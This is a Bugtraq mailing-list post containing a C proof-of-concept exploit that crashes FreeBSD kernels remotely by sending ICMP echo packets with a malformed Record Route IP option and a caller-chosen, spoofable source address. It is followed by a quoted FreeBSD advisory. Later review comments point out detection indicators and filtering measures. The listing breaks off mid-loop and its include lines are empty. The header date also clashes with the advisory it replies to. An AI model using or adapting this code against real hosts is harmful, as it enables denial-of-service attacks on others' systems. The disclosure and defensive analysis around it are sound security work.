Return-Path: owner-bugtraq@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:
Date: Wed, 13 Jan 1999 19:50:08 +0100
Reply-To: yeti
Sender: Bugtraq List
From: yeti
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000622215052.D642E37BF12@hub.freebsd.org>

/* NOTE(review): the header names of the two #include lines below were lost
 * when the page was extracted; only the bare directives survive. */
#include
#include

/*
  Remote denial-of-service in IP stack
  simple exploit by y3t1
  y3t1@rast.lodz.pdi.net

  Gretzzz : rastlin,z33d,vanitas,DYZIU,Kuki,vx,zx,korie,kaneda,
  d3cker&mroowka,jarv33s,funkySh,Shadow,tmoggie
  all from :
  #hwa.hax0r.news@efnet
  #darnet@efnet
*/

/*
 * Returns a pseudo-random integer derived from rand(), nominally in the
 * range 1..zakres ("zakres" is Polish for "range"). The product is formed
 * in single precision, so the upper bound is approximate.
 * Not called anywhere in the part of the listing that survives on this page.
 */
int rand_n(u_long zakres)
{
  return 1+(int) ((float)zakres*rand()/(RAND_MAX+1.0));
}

/*
 * Proof-of-concept sender for the IP-options bug described in the quoted
 * FreeBSD advisory at the end of this message. It builds one ICMP echo
 * request whose IP header carries a malformed Record Route option.
 *
 * Command line: -s source address, -d destination address,
 *               -p packet count (default 100).
 *
 * What a defender can take from the listing:
 *  - The source address is supplied by the caller (-s) and written straight
 *    into the IP header, so the source seen in a capture says nothing
 *    reliable about the sender.
 *  - IP id 242, TTL 48, ICMP id 242 and ICMP sequence 31337 are constants
 *    here; traffic from an unmodified copy carries them, which makes them
 *    usable as low-confidence indicators alongside the option bytes.
 *  - The option bytes themselves (type Record Route, length 3, pointer 0xff)
 *    are the stable thing to match on; see the comment where they are set.
 */
int main(int argc, char **argv)
{
  char a;                           /* current getopt() option character */
  int sock, c,pkt,ile;              /* "ile" (Polish: "how many") = packet count */
  struct hostent *host;
  u_long src_ip, dst_ip;            /* set only when -s / -d are given */
  u_char *buf;                      /* packet buffer, IP_MAXPACKET bytes */
  u_char options[4];                /* zeroed template for the 4 option bytes */
  int option_s = sizeof(options);
  struct ipoption ipopt;

  srand(time(NULL));
  ile=100;                          /* default packet count */
  printf(" -= Remote denial-of-service in IP stack =- \n");
  printf("\n");
  printf(" by y3t1/team140\n");
  printf(" y3t1@rast.lodz.pdi.net \n");
  printf("\n");
  if (argc < 4)
  {
    printf("%s -s src_addr -d dst_addr -p packets\n",argv[0]);
    printf(" -s src_addr - source address \n");
    printf(" -d dst_addr - dest address \n");
    printf(" -p packets - how many packets send to dest (default 100)\n");
    exit(1);
  }
  opterr=0;                         /* silence getopt's own error messages */
  while((a=getopt(argc,argv,"s:d:p:"))!=EOF)
  {
    switch(a) {
      /* -s / -d: try a name lookup first, fall back to dotted-quad parsing */
      case 's': {
        if ((host=gethostbyname(optarg))!=NULL)
          bcopy(host->h_addr,&src_ip,host->h_length);
        else src_ip=inet_addr(optarg);
        break;
      }
      case 'd': {
        if ((host=gethostbyname(optarg))!=NULL)
          bcopy(host->h_addr,&dst_ip,host->h_length);
        else dst_ip=inet_addr(optarg);
        break;
      }
      case 'p': {
        ile=atoi(optarg);
        break;
      }
    }
  }
  bzero(options,option_s);
  buf = malloc(IP_MAXPACKET);
  if (!buf)
  {
    perror("malloc");
    exit(-1);
  }
  sock = libnet_open_raw_sock(IPPROTO_RAW);
  if (sock == -1)
  {
    perror("socket");
    exit(-1);
  }
  /* IP header into buf: tos 0, id 242, no fragmentation, ttl 48, protocol
   * ICMP, caller-chosen addresses, no payload (argument order as in the
   * libnet 1.0 API -- TODO confirm against the libnet version used). */
  libnet_build_ip(LIBNET_ICMP_H ,0,242,0,48,IPPROTO_ICMP,src_ip,dst_ip,NULL,0,buf);
  memcpy(ipopt.ipopt_list, options, option_s);
  /*
   * The four option bytes: type = Record Route, length = 3, pointer = 0xff,
   * then one zero byte. RFC 791 gives 4 as the smallest legal pointer value
   * and counts type, length, pointer and route data in the length, so a
   * length of 3 leaves no room for route data and a pointer of 0xff lies
   * far beyond the option. Presumably this is the out-of-range argument
   * the quoted advisory says the IP stack failed to bounds-check.
   * For detection or filtering: an IPv4 header with options present whose
   * Record Route option has a pointer larger than its length. Dropping
   * packets that carry IP options at the filtering router or host firewall
   * also keeps such packets away from hosts that have not been patched.
   */
  *(ipopt.ipopt_list) = IPOPT_RR;
  *(ipopt.ipopt_list+1) = 3;
  *(ipopt.ipopt_list+2) = 0xff;
  *(ipopt.ipopt_list+3) = 0;
  /* splice the option into the IP header already built in buf */
  c = libnet_insert_ipo(&ipopt,option_s,buf);
  if (c == -1)
  {
    printf("Error\n");
    exit(1);
  }
  /* ICMP echo request (id 242, sequence 31337, no payload) placed directly
   * after the IP header plus the inserted option bytes */
  libnet_build_icmp_echo(ICMP_ECHO,0,242,31337,NULL,0,buf+LIBNET_IP_H+option_s);
  /* a checksum failure is only reported; execution continues */
  if (libnet_do_checksum(buf,IPPROTO_ICMP,LIBNET_ICMP_ECHO_H)==-1)
  {
    printf("can't do checksum \n");
  }
  /* NOTE(review): the listing is cut off inside the loop header below; the
   * rest of the loop and the end of main() were lost when the page was
   * extracted. Everything after it is the advisory text quoted by the
   * poster, not code. */
  for (pkt=0;pkt
-----BEGIN PGP SIGNED MESSAGE-----
> Topic: Remote denial-of-service in IP stack
>
> Category: core
> Module: kernel
>
> There are several bugs in the processing of IP options in the FreeBSD
> IP stack, which fail to correctly bounds-check arguments and contain
> other coding errors leading to the possibility of data corruption and
> a kernel panic upon reception of certain invalid IP packets.
>